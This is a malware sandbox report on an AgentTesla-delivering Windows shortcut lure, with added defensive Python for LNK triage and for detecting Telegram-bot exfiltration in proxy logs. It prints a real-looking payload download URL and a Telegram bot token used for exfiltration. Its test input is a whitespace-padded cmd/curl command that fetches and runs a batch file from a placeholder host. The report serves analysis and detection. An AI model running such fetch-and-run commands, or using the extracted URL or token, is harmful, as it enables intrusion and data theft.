General
- Target: Banque BEA_Copie de Paiement_txt.lnk.lnk
- Size: 2KB
- Sample: 240220-hxnp7adg87
- MD5: 32d11ce69ae0bae7375a6a9fcdf65238
- SHA1: d7ee753812e1b9180d7df3df34df08f13c97ac7a
- SHA256: 8420bf1711e75f17cb07a83a66e038f9635968eeaa17c3540c966347bb1d373c
- SHA512: 3e4c138fdb052ea6a1bd313f0330ce7a0f7b4abff4eccbc612aaccf639ef5fa50491987e8e22817e028c465762547cd253cc1f0d32944f106b0f06ab703cc2a3
Static task
- static1
Behavioral tasks
- behavioral1: Sample Banque BEA_Copie de Paiement_txt.lnk, Resource win7-20231215-en
- behavioral2: Sample Banque BEA_Copie de Paiement_txt.lnk, Resource win10v2004-20231222-en
Malware Config
- Extracted: https://remisat.com.uy/bim/office.bat
- Extracted (agenttesla): https://api.telegram.org/bot6788300365:AAHk2GTWUvl7PlvMxXk2M1D_7e1yYgg26zE/
The first entry is a URL to a batch file, presumably the stage the shortcut retrieves. The second is the AgentTesla exfiltration endpoint: the Telegram Bot API URL carries the operator's bot token in its path, so the token is both a blockable indicator and the credential the stealer uses to POST collected data.
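The submitted file is a 2KB shortcut and the first extracted artifact is a batch-file URL, which is the usual shape of an LNK lure: the shortcut's target and argument fields carry a command that fetches and runs the next stage. The following is an added example, not Hatching Triage's code and not the sample itself, that statically triages a .lnk by parsing the ShellLinkHeader and StringData blocks as laid out in MS-SHLLINK and flagging script hosts and download URLs in the target and arguments. The shortcut it parses is built inline as a constructed test input; its command line and the example.invalid URL are placeholders, not the real sample's arguments, which this report does not show.

```python
"""Minimal static triage of a Windows Shell Link (.lnk) file.

Added example for this report; not Triage's code and not the analysed
sample. Parses the ShellLinkHeader and StringData (MS-SHLLINK), extracts
the target/arguments a lure hides there, and flags script hosts and URLs.
The LNK built at the bottom is a constructed test input with an invented
command line; it is not the report's sample.
"""
import re
import struct
import uuid

SHELL_LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional blocks follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
SCRIPT_HOSTS = ("cmd", "powershell", "pwsh", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "curl", "bitsadmin")


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags plus whichever StringData fields the .lnk carries."""
    if len(data) < 0x4C:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, = struct.unpack_from("<I", data, 0)
    clsid = uuid.UUID(bytes_le=data[4:20])
    if header_size != 0x4C or clsid != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or LinkCLSID")
    flags, = struct.unpack_from("<I", data, 20)
    pos = header_size

    # LinkTargetIDList: uint16 size followed by that many bytes of item IDs
    if flags & HAS_LINK_TARGET_ID_LIST:
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    # LinkInfo: uint32 size that includes the size field itself
    if flags & HAS_LINK_INFO:
        size, = struct.unpack_from("<I", data, pos)
        pos += size

    def read_string() -> str:
        # StringData: uint16 CountCharacters, then UTF-16LE or ANSI text, no terminator
        nonlocal pos
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            raw, pos = data[pos:pos + 2 * count], pos + 2 * count
            return raw.decode("utf-16-le")
        raw, pos = data[pos:pos + count], pos + count
        return raw.decode("cp1252", errors="replace")

    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            fields[name] = read_string()
    return {"flags": flags, **fields}


def triage_lnk(data: bytes) -> dict:
    """Flag what phishing shortcuts typically hide: a script host plus a download URL."""
    info = parse_lnk(data)
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    hosts = [h for h in SCRIPT_HOSTS if re.search(r"\b" + h + r"(\.exe)?\b", target)]
    urls = URL_RE.findall(info.get("arguments", ""))
    # Leading whitespace beyond the 260-char Target box hides the payload in the Properties dialog
    padded = len(info.get("arguments", "")) > 260
    return {**info, "script_hosts": hosts, "urls": urls,
            "suspicious": bool(hosts and urls) or padded}


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk (no IDList/LinkInfo). Constructed test input only."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + SHELL_LINK_CLSID.bytes_le + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))  # attributes, times, size, icon, show, hotkey, reserved

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed lure: the host is a placeholder, not this report's IOC, and the
# command line is invented, not the real sample's.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    " " * 300 + r"/c curl -s -o %TEMP%\office.bat https://example.invalid/bim/office.bat "
                r"&& %TEMP%\office.bat",
)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

The parser only reads the header and StringData; it skips the IDList and LinkInfo and ignores ExtraData entirely, so a shortcut whose real target lives in an EnvironmentVariableDataBlock or whose arguments are spread across the IDList will come back clean. Treat a clean result from this check as "nothing in StringData", not as benign, and run the sample dynamically, as this report did.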
Targets
- Banque BEA_Copie de Paiement_txt.lnk.lnk (2KB; MD5, SHA1, SHA256 and SHA512 as listed under General)
Signatures
- AgentTesla: Agent Tesla is a remote access tool (RAT) and information stealer written in Visual Basic (.NET).
- Detect ZGRat V1
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence.
- Executes dropped EXE
- Adds Run key to start application (registry Run-key persistence)
- Looks up external IP address via web service: uses a legitimate IP lookup service to find the infected system's external IP.
- Suspicious use of SetThreadContext (typical of process hollowing, where the unpacked payload is injected into a suspended process)
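Two of the behaviours above are visible from the network alone: the external IP lookup, then traffic to the Telegram Bot API URL from the extracted AgentTesla config. The following is an added example, not Triage's code, of detection logic that correlates that sequence per client on proxy logs. The log lines are constructed for the example (fields: timestamp, client, method, URL), the IP-lookup host list is partial, and the bot token in the sample lines is a placeholder, not the token in this report.

```python
"""Correlate an external IP lookup with a following Telegram Bot API request
per client, the network shape of the AgentTesla behaviour in this report.
Added example, not Triage's code. The proxy log lines are constructed
(timestamp client method url) and the bot token in them is a placeholder,
not the one from the extracted config.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Bot API paths embed the token as "<bot id>:<35-char secret>"
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>\w+)"
)
# Services behind the "Looks up external IP address via web service" signature (partial list)
IP_LOOKUP_HOSTS = {"api.ipify.org", "ipinfo.io", "checkip.dyndns.org", "icanhazip.com", "ip-api.com"}
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")
HOST_RE = re.compile(r"^https?://([^/:?#]+)", re.IGNORECASE)


def parse_line(line: str):
    """Parse one constructed proxy log line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.fromisoformat(event["ts"])
    return event


def host_of(url: str) -> str:
    m = HOST_RE.match(url)
    return m.group(1).lower() if m else ""


def mask_token(bot_id: str, secret: str) -> str:
    """Keep enough to pivot on without copying a usable credential into tickets."""
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"


def detect(lines, window: timedelta = timedelta(minutes=10)):
    """One alert per Telegram Bot API request. Rated high when the same client
    queried an IP-lookup service within `window` beforehand and the request is
    a POST (an upload such as sendDocument), medium otherwise."""
    by_client = defaultdict(list)
    for line in lines:
        event = parse_line(line)
        if event:
            by_client[event["client"]].append(event)

    alerts = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e["ts"])
        lookups = [e["ts"] for e in events if host_of(e["url"]) in IP_LOOKUP_HOSTS]
        for e in events:
            tm = TELEGRAM_BOT_RE.match(e["url"])
            if not tm:
                continue
            preceded = any(timedelta(0) <= e["ts"] - t <= window for t in lookups)
            alerts.append({
                "client": client,
                "ts": e["ts"].isoformat(),
                "bot": mask_token(tm["bot_id"], tm["secret"]),
                "api_method": tm["method"],
                "ip_lookup_before": preceded,
                "severity": "high" if preceded and e["method"] == "POST" else "medium",
            })
    return alerts


# Constructed proxy log: 10.0.0.23 shows the report's sequence, 10.0.0.57 only touches the bot,
# 10.0.0.99 is ordinary browsing. The token is a placeholder.
SAMPLE_LOG = """\
2024-02-20T07:55:01 10.0.0.23 GET https://api.ipify.org/
2024-02-20T07:55:04 10.0.0.23 POST https://api.telegram.org/bot1234567890:AAHabcdefghijklmnopqrstuvwxyz012345/sendDocument
2024-02-20T08:10:12 10.0.0.57 GET https://api.telegram.org/bot1234567890:AAHabcdefghijklmnopqrstuvwxyz012345/getMe
2024-02-20T08:11:00 10.0.0.99 GET https://www.example.com/
""".splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Any traffic to api.telegram.org/bot<token>/ from a host that is not a known bot integration deserves a look on its own; the IP-lookup correlation only sets the priority. Because the full path is the credential, match on the bot id in blocklists and keep the masked form in alerts rather than the complete token.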